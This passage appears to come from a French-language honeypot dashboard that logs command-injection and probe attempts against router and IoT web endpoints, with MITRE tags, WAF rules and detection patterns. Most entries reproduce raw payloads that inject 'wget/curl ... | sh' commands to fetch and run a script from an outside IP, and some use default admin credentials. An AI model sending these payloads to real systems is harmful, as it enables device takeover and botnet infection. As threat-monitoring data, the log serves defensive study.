GET /Security/auditLog/search?logTime=0;`cd /tmp;wget http://91.92.40.118/wget.sh -O-|sh -s hik3;busybox wget http://91.92.40.118/wget.sh -O-|sh -s hik3;curl http://91.92.40.118/wget.sh|sh -s hik3` HTTP/1.1 Host: 62.3.50.33:8081 Connection: close |
|||||||
| TCP | 8081 · HTTP | http | Injection de commande cmd injection · via HTTP:8081 · (tentative d'exploit) · → /cgi-bin/downloadFlile.cgi | Élevée | Moyen · 54 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Exploitation
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
MITRE
T1059
TA0001
TA0002
Protocole
GET /cgi-bin/downloadFlile.cgi
Émulateur
HTTP
WAF
13
Recommandation
Investiguer
Tags
Cible HTTP
GET
/cgi-bin/downloadFlile.cgi
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
8081
Chemin / cible
/cgi-bin/downloadFlile.cgi
Service
HTTP
Pourquoi cette classification : Injection de commande (tag rce-0) · Sonde fichier sensible / config · confiance 100%
Confiance classification
100%
Risque capteur
Moyen
· 54
Confiance : Confiance 100 % — Preuve dans le payload · Motif catalogue confirmé
Protocole émulé
1
Signaux
MITRE-T1059
pat-0773
pat-0775
pat-0145
Technique MITRE
T1059
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
CRS 932100 cmd exec
CRS 932120 pipe chain
CRS 932200
CRS 932205
CRS 932206
LFI Double-dot bypass
Ligne de requête
User-Agent
—
Règles WAF
rce-0
nosqli-3
Payload (extrait)
GET /cgi-bin/downloadFlile.cgi?name=`cd /tmp;wget http://91.92.40.118/wget.sh -O-|sh -s toto5;busybox wget http://91.92.40.118/w
Requête brute (extrait)
GET /cgi-bin/downloadFlile.cgi?name=`cd /tmp;wget http://91.92.40.118/wget.sh -O-|sh -s toto5;busybox wget http://91.92.40.118/wget.sh -O-|sh -s toto5;curl http://91.92.40.118/wget.sh|sh -s toto5` HTTP/1.1 Host: 62.3.50.33:8081 Connection: close |
|||||||
| TCP | 8081 · HTTP | http | Injection de commande cmd injection · via HTTP:8081 · (tentative d'exploit) · → /HNAP1/GetDeviceSettings/`cd | Élevée | Élevé · 67 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Exploitation
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
MITRE
T1059
TA0001
TA0002
Protocole
GET /HNAP1/GetDeviceSettings/`cd
Émulateur
HTTP
WAF
54
Recommandation
Investiguer
Tags
Cible HTTP
GET
/HNAP1/GetDeviceSettings/`cd
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
8081
Chemin / cible
/HNAP1/GetDeviceSettings/`cd
Service
HTTP
Pourquoi cette classification : Injection de commande (tag lfi-12) · confiance 100%
Confiance classification
100%
Risque capteur
Élevé
· 67
Confiance : Confiance 100 % — Preuve dans le payload · Motif catalogue confirmé
Protocole émulé
1
Signaux
MITRE-T1059
pat-0773
pat-0775
pat-0145
Technique MITRE
T1059
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
CRS 932100 cmd exec
CRS 932120 pipe chain
CRS 932200
CRS 932205
CRS 932206
LFI Double-dot bypass
Probe /HNAP1/
Ligne de requête
User-Agent
—
Règles WAF
lfi-12
rce-0
rce-2
rce-5
ssrf-3
nosqli-3
Payload (extrait)
GET /HNAP1/GetDeviceSettings/`cd /tmp;wget http://91.92.40.118/wget.sh -O-|sh -s dhnap2;busybox wget http://91.92.40.118/wget.sh
Requête brute (extrait)
GET /HNAP1/GetDeviceSettings/`cd /tmp;wget http://91.92.40.118/wget.sh -O-|sh -s dhnap2;busybox wget http://91.92.40.118/wget.sh -O-|sh -s dhnap2;curl http://91.92.40.118/wget.sh|sh -s dhnap2` HTTP/1.1 Host: 62.3.50.33:8081 SOAPAction: "http://purenetwor |
|||||||
| TCP | 8081 · HTTP | http | Sonde fichier configuration config file probe · via HTTP:8081 · (tentative d'exploit) · → /login.cgi | Élevée | Moyen · 46 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Exploitation
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
MITRE
T1083
TA0001
TA0002
Protocole
POST /login.cgi
Émulateur
HTTP
WAF
0
Recommandation
Surveiller
Tags
Cible HTTP
POST
/login.cgi
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
POST
Port
8081
Chemin / cible
/login.cgi
Service
HTTP
Pourquoi cette classification : Sonde fichier sensible: chemin sensible (tag interne) · Correspondance tags WAF · Sonde fichier sensible / config · confiance 97%
Confiance classification
97%
Risque capteur
Moyen
· 46
Confiance : Confiance 97 % — 5 signal(aux) capteur
Protocole émulé
1
Signaux
Http Sensitive
Upstream
Technique MITRE
T1083
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
CRS 921130 duplicate CL
Ligne de requête
User-Agent
—
Règles WAF
—
Payload (extrait)
POST /login.cgi HTTP/1.1 Host: 62.3.50.33:8081 Content-Type: application/x-www-form-urlencoded Content-Length: 0 Connection:
Requête brute (extrait)
POST /login.cgi HTTP/1.1 Host: 62.3.50.33:8081 Content-Type: application/x-www-form-urlencoded Content-Length: 0 Connection: close |
|||||||
| TCP | 8081 · HTTP | http | Injection de commande cmd injection · via HTTP:8081 · (tentative d'exploit) · → /diagnostic.php | Élevée | Élevé · 82 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Exploitation
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
MITRE
T1059
TA0001
TA0002
Protocole
POST /diagnostic.php
Émulateur
HTTP
WAF
41
Recommandation
Investiguer
Tags
Cible HTTP
POST
/diagnostic.php
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
POST
Port
8081
Chemin / cible
/diagnostic.php
Service
HTTP
Pourquoi cette classification : Injection de commande (tag lfi-12) · Injection commande dans la requête · confiance 100%
Confiance classification
100%
Risque capteur
Élevé
· 82
Confiance : Confiance 100 % — Preuve dans le payload · Motif catalogue confirmé
Protocole émulé
1
Signaux
Http Cmdi
pat-0146
Technique MITRE
T1059
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
CRS 921130 duplicate CL
CRS 932205
LFI Double-dot bypass
Ligne de requête
User-Agent
—
Règles WAF
lfi-12
rce-0
rce-5
ssrf-3
nosqli-3
Payload (extrait)
POST /diagnostic.php HTTP/1.1 Host: 62.3.50.33:8081 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Content-Le
Requête brute (extrait)
POST /diagnostic.php HTTP/1.1 Host: 62.3.50.33:8081 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Content-Length: 218 Connection: close act=ping&dst=%26%20cd%20/tmp%3Bwget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20ddiag%3Bbusy |
|||||||
| TCP | 8081 · HTTP | http | Sonde HTTP smuggling http smuggling probe · via HTTP:8081 · (tentative d'exploit) · → /JNAP/ | Élevée | Élevé · 80 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Exploitation
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
MITRE
TA0001
TA0001
TA0002
Protocole
POST /JNAP/
Émulateur
HTTP
WAF
52
Recommandation
Investiguer
Tags
Cible HTTP
POST
/JNAP/
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
POST
Port
8081
Chemin / cible
/JNAP/
Service
HTTP
Pourquoi cette classification : Motif SSRF · confiance 95%
Confiance classification
95%
Risque capteur
Élevé
· 80
Confiance : Confiance 95 % — Motif catalogue confirmé · 8 tag(s) WAF
Protocole émulé
1
Signaux
pat-0842
Technique MITRE
TA0001
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
CRS 921130 duplicate CL
LFI Double-dot bypass
Ligne de requête
User-Agent
—
Règles WAF
lfi-12
rce-0
rce-5
ssrf-3
nosqli-3
Payload (extrait)
POST /JNAP/ HTTP/1.1 Host: 62.3.50.33:8081 Content-Type: application/json X-JNAP-ACTION: http://linksys.com/jnap/wpsstationin
Requête brute (extrait)
POST /JNAP/ HTTP/1.1 Host: 62.3.50.33:8081 Content-Type: application/json X-JNAP-ACTION: http://linksys.com/jnap/wpsstationinfo/GetStationInfo Content-Length: 205 Connection: close device_name=cd%20/tmp%3Bwget%20http://91.92.40.118/wget.sh%20-O-%7C |
|||||||
| TCP | 8081 · HTTP | http | Sonde fichier configuration config file probe · via HTTP:8081 · (tentative d'exploit) · → /wget.sh%20-O-%7Csh%20-s%20tenda%3Bbusybox%20wg… | Élevée | Moyen · 64 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Exploitation
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
MITRE
T1083
TA0001
TA0002
Protocole
GET /wget.sh%20-O-%7Csh%20-s%20tenda%3Bbusybox%20wget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20t…
Émulateur
HTTP
WAF
47
Recommandation
Investiguer
Tags
Cible HTTP
GET
/wget.sh%20-O-%7Csh%20-s%20tenda%3Bbusybox%20wget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20tenda%3Bcurl%20http://91.92.40.118/wget.sh%7Csh%20-s%20tenda
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
8081
Chemin / cible
/wget.sh%20-O-%7Csh%20-s%20tenda%3Bbusybox%20wget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20tenda%3Bcurl%20http://91.92.40.118/wget.sh%7Csh%20-s%20tenda
Service
HTTP
Pourquoi cette classification : Sonde fichier sensible: chemin sensible (tag interne) · Règle WAF « lfi-12 » · Sonde fichier sensible / config · confiance 100%
Confiance classification
100%
Risque capteur
Moyen
· 64
Confiance : Confiance 100 % — 7 tag(s) WAF
Protocole émulé
1
Signaux
Http Sensitive
Upstream
Waf Score
Technique MITRE
T1083
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
LFI Double-dot bypass
Ligne de requête
User-Agent
—
Règles WAF
lfi-12
rce-0
rce-5
ssrf-3
nosqli-3
redir-1
Payload (extrait)
GET /goform/setUsbUnload/.js?deviceName=A;cd%20/tmp%3Bwget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20tenda%3Bbusybox%20wge
Requête brute (extrait)
GET /goform/setUsbUnload/.js?deviceName=A;cd%20/tmp%3Bwget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20tenda%3Bbusybox%20wget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20tenda%3Bcurl%20http://91.92.40.118/wget.sh%7Csh%20-s%20tenda HTTP/1.1 Host: 6 |
|||||||
| TCP | 8081 · HTTP | http | Traversal LFI lfi path traversal · via HTTP:8081 · (tentative d'exploit) · → /wget.sh%20-O-%7Csh%20-s%20dcs%3Bbusybox%20wget… | Élevée | Moyen · 60 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Exploitation
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
MITRE
TA0001
TA0001
TA0002
Protocole
GET /wget.sh%20-O-%7Csh%20-s%20dcs%3Bbusybox%20wget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20dcs…
Émulateur
HTTP
WAF
53
Recommandation
Investiguer
Tags
Cible HTTP
GET
/wget.sh%20-O-%7Csh%20-s%20dcs%3Bbusybox%20wget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20dcs%3Bcurl%20http://91.92.40.118/wget.sh%7Csh%20-s%20dcs
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
8081
Chemin / cible
/wget.sh%20-O-%7Csh%20-s%20dcs%3Bbusybox%20wget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20dcs%3Bcurl%20http://91.92.40.118/wget.sh%7Csh%20-s%20dcs
Service
HTTP
Pourquoi cette classification : Paramètres de scan · confiance 59%
Confiance classification
59%
Risque capteur
Moyen
· 60
Confiance : Confiance 59 % — 8 tag(s) WAF
Protocole émulé
1
Signaux
CRS-930100-sub
Technique MITRE
TA0001
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
LFI Double-dot bypass
Ligne de requête
User-Agent
—
Règles WAF
lfi-12
rce-0
rce-5
ssrf-3
nosqli-3
redir-1
webshell-param-cmd
Payload (extrait)
GET /config/?cmd=cd%20/tmp%3Bwget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20dcs%3Bbusybox%20wget%20http://91.92.40.118/wge
Requête brute (extrait)
GET /config/?cmd=cd%20/tmp%3Bwget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20dcs%3Bbusybox%20wget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20dcs%3Bcurl%20http://91.92.40.118/wget.sh%7Csh%20-s%20dcs HTTP/1.1 Host: 62.3.50.33:8081 Connection: clo |
|||||||
| TCP | 8081 · HTTP | http | Injection de commande cmd injection · via HTTP:8081 · (tentative d'exploit) · → /JNAP/ | Élevée | Élevé · 82 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Exploitation
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
MITRE
T1059
TA0001
TA0002
Protocole
POST /JNAP/
Émulateur
HTTP
WAF
66
Recommandation
Investiguer
Tags
Cible HTTP
POST
/JNAP/
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
POST
Port
8081
Chemin / cible
/JNAP/
Service
HTTP
Pourquoi cette classification : Injection de commande (tag lfi-12) · Injection commande dans la requête · confiance 100%
Confiance classification
100%
Risque capteur
Élevé
· 82
Confiance : Confiance 100 % — Preuve dans le payload · Motif catalogue confirmé
Protocole émulé
1
Signaux
Http Cmdi
pat-0146
Technique MITRE
T1059
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
CRS 921130 duplicate CL
CRS 932205
LFI Double-dot bypass
Ligne de requête
User-Agent
—
Règles WAF
lfi-12
rce-0
rce-2
rce-5
ssrf-3
nosqli-3
Payload (extrait)
POST /JNAP/ HTTP/1.1 Host: 62.3.50.33:8081 Content-Type: application/json; charset=utf-8 X-JNAP-Action: http://linksys.com/jn
Requête brute (extrait)
POST /JNAP/ HTTP/1.1 Host: 62.3.50.33:8081 Content-Type: application/json; charset=utf-8 X-JNAP-Action: http://linksys.com/jnap/firmware/Upgrade Content-Length: 251 Connection: close {"JNAP":{"action":"http://linksys.com/jnap/firmware/Upgrade","com
|
|||||||
| TCP | 8081 · HTTP | http | Traversal LFI lfi path traversal · via HTTP:8081 · (tentative d'exploit) · → /wget.sh%20-O-%7Csh%20-s%20lsysinfo%3Bbusybox%2… | Élevée | Moyen · 60 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Exploitation
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
MITRE
TA0001
TA0001
TA0002
Protocole
GET /wget.sh%20-O-%7Csh%20-s%20lsysinfo%3Bbusybox%20wget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%…
Émulateur
HTTP
WAF
41
Recommandation
Investiguer
Tags
Cible HTTP
GET
/wget.sh%20-O-%7Csh%20-s%20lsysinfo%3Bbusybox%20wget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20lsysinfo%3Bcurl%20http://91.92.40.118/wget.sh%7Csh%20-s%20lsysinfo
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
8081
Chemin / cible
/wget.sh%20-O-%7Csh%20-s%20lsysinfo%3Bbusybox%20wget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20lsysinfo%3Bcurl%20http://91.92.40.118/wget.sh%7Csh%20-s%20…
Service
HTTP
Pourquoi cette classification : Type « lfi_path_traversal » (signaux protocolaires) · confiance 59%
Confiance classification
59%
Risque capteur
Moyen
· 60
Confiance : Confiance 59 % — 6 tag(s) WAF
Protocole émulé
1
Signaux
CRS-930100-sub
Technique MITRE
TA0001
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
LFI Double-dot bypass
Ligne de requête
User-Agent
—
Règles WAF
lfi-12
rce-0
rce-5
ssrf-3
nosqli-3
redir-1
Payload (extrait)
GET /sysinfo.cgi?action=;cd%20/tmp%3Bwget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20lsysinfo%3Bbusybox%20wget%20http://91.
Requête brute (extrait)
GET /sysinfo.cgi?action=;cd%20/tmp%3Bwget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20lsysinfo%3Bbusybox%20wget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20lsysinfo%3Bcurl%20http://91.92.40.118/wget.sh%7Csh%20-s%20lsysinfo HTTP/1.1 Host: 62.3.50.3 |
|||||||
| TCP | 8081 · HTTP | http | Sonde fichier configuration config file probe · via HTTP:8081 · (tentative d'exploit) · → /wget.sh%20-O-%7Csh%20-s%20lsetup%3Bbusybox%20w… | Élevée | Moyen · 64 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Exploitation
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
MITRE
T1083
TA0001
TA0002
Protocole
GET /wget.sh%20-O-%7Csh%20-s%20lsetup%3Bbusybox%20wget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20…
Émulateur
HTTP
WAF
41
Recommandation
Investiguer
Tags
Cible HTTP
GET
/wget.sh%20-O-%7Csh%20-s%20lsetup%3Bbusybox%20wget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20lsetup%3Bcurl%20http://91.92.40.118/wget.sh%7Csh%20-s%20lsetup
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
8081
Chemin / cible
/wget.sh%20-O-%7Csh%20-s%20lsetup%3Bbusybox%20wget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20lsetup%3Bcurl%20http://91.92.40.118/wget.sh%7Csh%20-s%20lset…
Service
HTTP
Pourquoi cette classification : Sonde fichier sensible: chemin sensible (tag interne) · Règle WAF « lfi-12 » · Sonde fichier sensible / config · confiance 100%
Confiance classification
100%
Risque capteur
Moyen
· 64
Confiance : Confiance 100 % — 6 tag(s) WAF
Protocole émulé
1
Signaux
Http Sensitive
Upstream
Waf Score
Technique MITRE
T1083
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
LFI Double-dot bypass
Ligne de requête
User-Agent
—
Règles WAF
lfi-12
rce-0
rce-5
ssrf-3
nosqli-3
redir-1
Payload (extrait)
GET /setup.cgi?next_file=;cd%20/tmp%3Bwget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20lsetup%3Bbusybox%20wget%20http://91.9
Requête brute (extrait)
GET /setup.cgi?next_file=;cd%20/tmp%3Bwget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20lsetup%3Bbusybox%20wget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20lsetup%3Bcurl%20http://91.92.40.118/wget.sh%7Csh%20-s%20lsetup HTTP/1.1 Host: 62.3.50.33:808 |
|||||||
| TCP | 8081 · HTTP | http | Injection de commande cmd injection · via HTTP:8081 · (tentative d'exploit) · → /apply.cgi | Élevée | Élevé · 82 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Exploitation
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
MITRE
T1059
TA0001
TA0002
Protocole
POST /apply.cgi
Émulateur
HTTP
WAF
34
Recommandation
Investiguer
Tags
Cible HTTP
POST
/apply.cgi
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
POST
Port
8081
Chemin / cible
/apply.cgi
Service
HTTP
Pourquoi cette classification : Injection de commande (tag lfi-12) · Injection commande dans la requête · confiance 100%
Confiance classification
100%
Risque capteur
Élevé
· 82
Confiance : Confiance 100 % — Preuve dans le payload · Motif catalogue confirmé
Protocole émulé
1
Signaux
Http Cmdi
pat-0146
Technique MITRE
T1059
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
CRS 921130 duplicate CL
Cred Basic auth spray
CRS 932205
Ligne de requête
User-Agent
—
Règles WAF
lfi-12
rce-0
rce-5
ssrf-3
nosqli-3
Payload (extrait)
POST /apply.cgi HTTP/1.1 Host: 62.3.50.33:8081 Authorization: Basic YWRtaW46YWRtaW4= Content-Type: application/x-www-form-url
Requête brute (extrait)
POST /apply.cgi HTTP/1.1 Host: 62.3.50.33:8081 Authorization: Basic YWRtaW46YWRtaW4= Content-Type: application/x-www-form-urlencoded Content-Length: 255 Connection: close action=Apply&change_action=gozila_cgi&submit_type=&pptp_ip=cd%20/tmp%3Bwget%2 |
|||||||
| TCP | 8081 · HTTP | http | Sonde HTTP smuggling http smuggling probe · via HTTP:8081 · (tentative d'exploit) · → /apply.cgi | Élevée | Élevé · 80 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Exploitation
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
MITRE
TA0001
TA0001
TA0002
Protocole
POST /apply.cgi
Émulateur
HTTP
WAF
34
Recommandation
Investiguer
Tags
Cible HTTP
POST
/apply.cgi
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
POST
Port
8081
Chemin / cible
/apply.cgi
Service
HTTP
Pourquoi cette classification : Motif SSRF · confiance 95%
Confiance classification
95%
Risque capteur
Élevé
· 80
Confiance : Confiance 95 % — Motif catalogue confirmé · 5 tag(s) WAF
Protocole émulé
1
Signaux
pat-0842
Technique MITRE
TA0001
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
CRS 921130 duplicate CL
LFI Double-dot bypass
Ligne de requête
User-Agent
—
Règles WAF
lfi-12
rce-0
rce-5
ssrf-3
nosqli-3
Payload (extrait)
POST /apply.cgi HTTP/1.1 Host: 62.3.50.33:8081 Content-Type: application/x-www-form-urlencoded Content-Length: 243 Connectio
Requête brute (extrait)
POST /apply.cgi HTTP/1.1 Host: 62.3.50.33:8081 Content-Type: application/x-www-form-urlencoded Content-Length: 243 Connection: close wl_ssid=cd%20/tmp%3Bwget%20http://91.92.40.118/wget.sh%20-O-%7Csh%20-s%20lwizard%3Bbusybox%20wget%20http://91.92.40. |
|||||||
| TCP | 8081 · HTTP | http | Injection de commande cmd injection · via HTTP:8081 · (tentative d'exploit) · → /JNAP/ | Élevée | Élevé · 82 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Exploitation
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
MITRE
T1059
TA0001
TA0002
Protocole
POST /JNAP/
Émulateur
HTTP
WAF
66
Recommandation
Investiguer
Tags
Cible HTTP
POST
/JNAP/
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
POST
Port
8081
Chemin / cible
/JNAP/
Service
HTTP
Pourquoi cette classification : Injection de commande (tag lfi-12) · Injection commande dans la requête · confiance 100%
Confiance classification
100%
Risque capteur
Élevé
· 82
Confiance : Confiance 100 % — Preuve dans le payload · Motif catalogue confirmé
Protocole émulé
1
Signaux
Http Cmdi
pat-0146
Technique MITRE
T1059
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
CRS 921130 duplicate CL
CRS 932205
LFI Double-dot bypass
Ligne de requête
User-Agent
—
Règles WAF
lfi-12
rce-0
rce-2
rce-5
ssrf-3
nosqli-3
Payload (extrait)
POST /JNAP/ HTTP/1.1 Host: 62.3.50.33:8081 Content-Type: application/json; charset=utf-8 X-JNAP-Action: http://linksys.com/jn
Requête brute (extrait)
POST /JNAP/ HTTP/1.1 Host: 62.3.50.33:8081 Content-Type: application/json; charset=utf-8 X-JNAP-Action: http://linksys.com/jnap/setup/SetupWizard Content-Length: 236 Connection: close {"JNAP":{"action":"http://linksys.com/jnap/setup/SetupWizard","c
|
|||||||
| TCP | 8081 · HTTP | http | Injection de commande cmd injection · via HTTP:8081 · (tentative d'exploit) · → /JNAP/ | Élevée | Élevé · 82 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Exploitation
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
MITRE
T1059
TA0001
TA0002
Protocole
POST /JNAP/
Émulateur
HTTP
WAF
72
Recommandation
Investiguer
Tags
Cible HTTP
POST
/JNAP/
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
POST
Port
8081
Chemin / cible
/JNAP/
Service
HTTP
Pourquoi cette classification : Injection de commande (tag lfi-12) · Injection commande dans la requête · confiance 100%
Confiance classification
100%
Risque capteur
Élevé
· 82
Confiance : Confiance 100 % — Preuve dans le payload · Motif catalogue confirmé
Protocole émulé
1
Signaux
Http Cmdi
pat-0146
Technique MITRE
T1059
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
CRS 921130 duplicate CL
CRS 932205
LFI Double-dot bypass
Ligne de requête
User-Agent
—
Règles WAF
lfi-12
rce-0
rce-2
rce-5
ssrf-2
ssrf-3
nosqli-3
Payload (extrait)
POST /JNAP/ HTTP/1.1 Host: 62.3.50.33:8081 Content-Type: application/json; charset=utf-8 X-JNAP-Action: http://linksys.com/jn
Requête brute (extrait)
POST /JNAP/ HTTP/1.1 Host: 62.3.50.33:8081 Content-Type: application/json; charset=utf-8 X-JNAP-Action: http://linksys.com/jnap/network/Diagnostics Content-Length: 269 Connection: close {"JNAP":{"action":"http://linksys.com/jnap/network/Diagnostics
|
|||||||
| TCP | 8081 · HTTP | http | Injection de commande cmd injection · via HTTP:8081 · (tentative d'exploit) · → /apply.cgi | Élevée | Élevé · 82 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Exploitation
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
MITRE
T1059
TA0001
TA0002
Protocole
POST /apply.cgi
Émulateur
HTTP
WAF
34
Recommandation
Investiguer
Tags
Cible HTTP
POST
/apply.cgi
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
POST
Port
8081
Chemin / cible
/apply.cgi
Service
HTTP
Pourquoi cette classification : Injection de commande (tag lfi-12) · Injection commande dans la requête · confiance 100%
Confiance classification
100%
Risque capteur
Élevé
· 82
Confiance : Confiance 100 % — Preuve dans le payload · Motif catalogue confirmé
Protocole émulé
1
Signaux
Http Cmdi
pat-0146
Technique MITRE
T1059
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
CRS 921130 duplicate CL
Cred Basic auth spray
CRS 932205
Ligne de requête
User-Agent
—
Règles WAF
lfi-12
rce-0
rce-5
ssrf-3
nosqli-3
Payload (extrait)
POST /apply.cgi HTTP/1.1 Host: 62.3.50.33:8081 Authorization: Basic YWRtaW46YWRtaW4= Content-Type: application/x-www-form-url
Requête brute (extrait)
POST /apply.cgi HTTP/1.1 Host: 62.3.50.33:8081 Authorization: Basic YWRtaW46YWRtaW4= Content-Type: application/x-www-form-urlencoded Content-Length: 352 Connection: close submit_button=Diagnostics&change_action=gozila_cgi&submit_type=start_tracerou |
|||||||
| TCP | 8081 · HTTP | http | Injection de commande cmd injection · via HTTP:8081 · (tentative d'exploit) · → /storage/apply.cgi | Élevée | Élevé · 82 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Exploitation
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
MITRE
T1059
TA0001
TA0002
Protocole
POST /storage/apply.cgi
Émulateur
HTTP
WAF
40
Recommandation
Investiguer
Tags
Cible HTTP
POST
/storage/apply.cgi
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
POST
Port
8081
Chemin / cible
/storage/apply.cgi
Service
HTTP
Pourquoi cette classification : Injection de commande (tag lfi-12) · Injection commande dans la requête · confiance 100%
Confiance classification
100%
Risque capteur
Élevé
· 82
Confiance : Confiance 100 % — Preuve dans le payload · Motif catalogue confirmé
Protocole émulé
1
Signaux
Http Cmdi
pat-0146
Technique MITRE
T1059
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
CRS 921130 duplicate CL
Cred Basic auth spray
CRS 932205
LFI Double-dot bypass
Ligne de requête
User-Agent
—
Règles WAF
lfi-12
rce-0
rce-5
ssrf-3
nosqli-3
Payload (extrait)
POST /storage/apply.cgi HTTP/1.1 Host: 62.3.50.33:8081 Authorization: Basic YWRtaW46YWRtaW4= Content-Type: application/x-www-
Requête brute (extrait)
POST /storage/apply.cgi HTTP/1.1 Host: 62.3.50.33:8081 Authorization: Basic YWRtaW46YWRtaW4= Content-Type: application/x-www-form-urlencoded Content-Length: 230 Connection: close next_page=/tmp/.s&submit_button=;cd%20/tmp%3Bwget%20http://91.92.40.1 |
|||||||
| TCP | 8081 · HTTP | http | Injection de commande cmd injection · via HTTP:8081 · (tentative d'exploit) · → /apply.cgi | Élevée | Élevé · 82 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Exploitation
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
MITRE
T1059
TA0001
TA0002
Protocole
POST /apply.cgi
Émulateur
HTTP
WAF
34
Recommandation
Investiguer
Tags
Cible HTTP
POST
/apply.cgi
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
POST
Port
8081
Chemin / cible
/apply.cgi
Service
HTTP
Pourquoi cette classification : Injection de commande (tag lfi-12) · Injection commande dans la requête · confiance 100%
Confiance classification
100%
Risque capteur
Élevé
· 82
Confiance : Confiance 100 % — Preuve dans le payload · Motif catalogue confirmé
Protocole émulé
1
Signaux
Http Cmdi
pat-0146
Technique MITRE
T1059
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
CRS 921130 duplicate CL
Cred Basic auth spray
CRS 932205
Ligne de requête
User-Agent
—
Règles WAF
lfi-12
rce-0
rce-5
ssrf-3
nosqli-3
Payload (extrait)
